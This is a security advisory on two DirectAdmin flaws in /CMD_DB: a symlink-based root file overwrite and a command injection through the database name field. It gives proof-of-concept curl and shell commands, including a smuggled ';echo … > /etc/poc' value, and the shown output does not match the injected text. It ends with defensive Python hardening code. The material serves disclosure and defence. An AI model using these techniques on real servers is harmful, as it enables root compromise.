Subject: DirectAdmin < 1.33.4 Local file overwrite & Local root escalation
Author: Anonymous
ReleaseID: d8253f15e447935c24ab38a215735931942a77717d7b55d84200d070d1e54d3b
Date: 22-04-2009

The issue on http://www.directadmin.com/features.php?id=968 is larger than the wording would indicate. It fixes two issues in /CMD_DB.

--- Local file overwrite ---

action=backup runs a mysqldump as root and generates a predictable temporary file in the temporary directory defined as tmpdir in /usr/local/directadmin/conf: "$tmpdir/${dbname}.gz". It does not check if the file exists before piping the output of "mysqldump | gzip" into it, allowing any DA user to create or overwrite any file on the server as root.

PoC:

On server:
$ ln -s /etc/poc /home/tmp/database_name.gz

On client:
$ curl http://directadminserver:2222/CMD_DB/database_name.gz

On server:
$ ls -la /etc/poc
-rw-r--r-- 1 root root 514 Apr 22 09:05 /etc/poc
$ zcat /etc/poc | head -1
-- MySQL dump 10.9

--- Local root escalation ---

action=restore runs a "gunzip | mysql $dbname" as root, with $dbname being unchecked, allowing any DA user to run any code as root.

PoC:

On client:
curl -n -F action=restore -F domain=poc.com -F 'file1=@database.gz' -F method=default -F 'name=poc_db;echo poc > /etc/poc' http://directadminserver:2222/CMD_DB

On server:
$ ls -la /etc/poc
-rw-r--r-- 1 root root 5 Apr 22 10:30 /etc/poc
$ cat /etc/poc
test

--
Anonymous
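Both flaws above come down to two missing checks in a root-privileged handler: the backup target is opened without refusing a pre-existing entry (so a planted symlink redirects root's write), and the database name reaches a shell unvalidated. The following is an added illustration of the corrected pattern, written for this advisory and not taken from DirectAdmin's code; the function names, the identifier allowlist and the constructed temporary directory are assumptions.

```python
import os
import re
import tempfile

# Database names are restricted to plain identifiers, so values like
# "poc_db;echo poc > /etc/poc" never reach a command line (assumed rule).
_DB_NAME_RE = re.compile(r"^[A-Za-z0-9_]{1,64}$")


def validate_db_name(name: str) -> bool:
    """True only for a bare identifier; checked before any command is built."""
    return bool(_DB_NAME_RE.fullmatch(name))


def restore_argv(dbname: str) -> list:
    """Build the restore command as an argv list (no shell), name validated."""
    if not validate_db_name(dbname):
        raise ValueError("invalid database name: %r" % dbname)
    return ["mysql", dbname]


def open_backup_target(tmpdir: str, dbname: str) -> int:
    """Create "$tmpdir/$dbname.gz" as a brand-new file and return its fd.

    O_EXCL makes open(2) fail on any existing entry, including a symlink
    (regardless of where it points); O_NOFOLLOW is belt-and-braces on
    platforms that have it. The file is created root-only (0600).
    """
    if not validate_db_name(dbname):
        raise ValueError("invalid database name: %r" % dbname)
    path = os.path.join(tmpdir, dbname + ".gz")
    flags = os.O_WRONLY | os.O_CREAT | os.O_EXCL | getattr(os, "O_NOFOLLOW", 0)
    return os.open(path, flags, 0o600)


def planted_symlink_is_refused(dbname: str = "database_name") -> bool:
    """Constructed scenario mirroring the advisory: a symlink is planted at
    the predictable backup path. Returns True if the open is refused and the
    symlink's target was never created."""
    tmpdir = tempfile.mkdtemp()
    victim = os.path.join(tmpdir, "victim")  # stands in for /etc/poc
    os.symlink(victim, os.path.join(tmpdir, dbname + ".gz"))
    try:
        fd = open_backup_target(tmpdir, dbname)
    except FileExistsError:
        return not os.path.exists(victim)
    os.close(fd)
    return False
```

A second hardening step, not shown here, is to drop the predictable name altogether and write the dump to a mkstemp()-style random file inside a directory that only root can write to.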